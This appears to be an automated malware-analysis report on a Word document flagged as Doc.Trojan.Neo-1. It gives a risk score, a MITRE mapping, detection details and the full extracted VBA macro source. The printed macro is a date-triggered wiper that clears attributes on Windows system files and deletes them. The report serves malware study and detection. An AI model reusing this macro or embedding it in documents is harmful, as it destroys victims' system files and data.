MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample is a Microsoft Word document containing VBA macros. The 'Form_Load' subroutine within the macros attempts to delete several critical system files including 'c:\windows\win.ini', 'c:\autoexec.bat', 'c:\windows\himem.sys', and 'c:\windows\notepad.exe'. This behavior is indicative of a destructive payload, commonly associated with wipers or destructive malware.
Heuristics 2
-
ClamAV: Doc.Trojan.Neo-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Neo-1
-
VBA macros detected medium OLE_VBA_MACROSDocument contains VBA macro code
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 744 bytes |
SHA-256: fcec8c8f72db10aa8687c8134eafff21d9bf441ce5640f9abf505fabf56b5b13 |
|||
|
Detection
ClamAV:
Doc.Trojan.Neo-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub Form_Load() form1.Hide If Date$ > "07-04-2000" Then GoTo del Else If Year(Now) > 1999 Then End Else Date$ = "05-30-1999" End del: file1 = "c:\windows\win.ini" file2 = "c:\autoexec.bat" file3 = "c:\windows\himem.sys" file4 = "c:\windows\notepad.exe" file5 = "c:\" On Error Resume Next SetAttr file1, 0 SetAttr file2, 0 SetAttr file3, 0 SetAttr file4, 0 SetAttr file5, 0 Kill file1 Kill file2 Kill file3 Kill file4 Kill file5 End 'The Chaos Virus 'By: Neo End Sub |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.